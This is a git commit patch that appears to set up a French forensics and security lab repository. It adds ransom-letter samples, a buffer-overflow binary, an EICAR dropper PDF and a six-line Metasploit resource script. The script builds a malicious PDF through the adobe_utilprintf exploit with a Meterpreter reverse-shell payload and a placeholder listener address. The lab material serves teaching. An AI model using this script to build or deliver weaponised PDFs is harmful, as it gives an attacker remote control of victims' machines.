From 696111049388b5a8f51b02e331b24c6650d4799e Mon Sep 17 00:00:00 2001
From: jerome <jerome@xlinfo.fr>
Date: Mon, 13 Nov 2023 01:34:03 +0100
Subject: commit initial

---
 criminalistique/Sample-Chain-of-Custody-Form.pdf | Bin 0 -> 63058 bytes
 criminalistique/letter-image.jpg                 | Bin 0 -> 127107 bytes
 criminalistique/ransom-letter.doc                | Bin 0 -> 153088 bytes
 criminalistique/ransom-letter.pdf                | Bin 0 -> 71371 bytes
 criminalistique/tp.pdf                           | Bin 0 -> 61089 bytes
 elf/bufferflow                                   | Bin 0 -> 21264 bytes
 elf/hello.c                                      |   6 ++++++
 malware/maliciouspdf.rc                          |   6 ++++++
 malware/pdf-doc-vba-eicar-dropper.pdf            | Bin 0 -> 10381 bytes
 9 files changed, 12 insertions(+)
 create mode 100644 criminalistique/Sample-Chain-of-Custody-Form.pdf
 create mode 100755 criminalistique/letter-image.jpg
 create mode 100755 criminalistique/ransom-letter.doc
 create mode 100755 criminalistique/ransom-letter.pdf
 create mode 100644 criminalistique/tp.pdf
 create mode 100755 elf/bufferflow
 create mode 100644 elf/hello.c
 create mode 100644 malware/maliciouspdf.rc
 create mode 100644 malware/pdf-doc-vba-eicar-dropper.pdf

diff --git a/criminalistique/Sample-Chain-of-Custody-Form.pdf b/criminalistique/Sample-Chain-of-Custody-Form.pdf
new file mode 100644
index 0000000..19f283c
Binary files /dev/null and b/criminalistique/Sample-Chain-of-Custody-Form.pdf differ
diff --git a/criminalistique/letter-image.jpg b/criminalistique/letter-image.jpg
new file mode 100755
index 0000000..6185682
Binary files /dev/null and b/criminalistique/letter-image.jpg differ
diff --git a/criminalistique/ransom-letter.doc b/criminalistique/ransom-letter.doc
new file mode 100755
index 0000000..057c5ed
Binary files /dev/null and b/criminalistique/ransom-letter.doc differ
diff --git a/criminalistique/ransom-letter.pdf b/criminalistique/ransom-letter.pdf
new file mode 100755
index 0000000..27b8f6f
Binary files /dev/null and b/criminalistique/ransom-letter.pdf differ
diff --git a/criminalistique/tp.pdf b/criminalistique/tp.pdf
new file mode 100644
index 0000000..e621c82
Binary files /dev/null and b/criminalistique/tp.pdf differ
diff --git a/elf/bufferflow b/elf/bufferflow
new file mode 100755
index 0000000..c51098e
Binary files /dev/null and b/elf/bufferflow differ
diff --git a/elf/hello.c b/elf/hello.c
new file mode 100644
index 0000000..0aa057e
--- /dev/null
+++ b/elf/hello.c
@@ -0,0 +1,6 @@
+#include <stdio.h>
+void main(void)
+{
+    char * hello="Hello World !\n";
+    printf (hello);
+}
diff --git a/malware/maliciouspdf.rc b/malware/maliciouspdf.rc
new file mode 100644
index 0000000..71c6c09
--- /dev/null
+++ b/malware/maliciouspdf.rc
@@ -0,0 +1,6 @@
+use exploit/windows/fileformat/adobe_utilprintf
+set FILENAME malicious.pdf
+set PAYLOAD windows/meterpreter/reverse_tcp
+set LHOST listening_ip
+set LPORT tcp_port
+exploit
diff --git a/malware/pdf-doc-vba-eicar-dropper.pdf b/malware/pdf-doc-vba-eicar-dropper.pdf
new file mode 100644
index 0000000..ebd6c4b
Binary files /dev/null and b/malware/pdf-doc-vba-eicar-dropper.pdf differ
-- 
cgit v1.2.3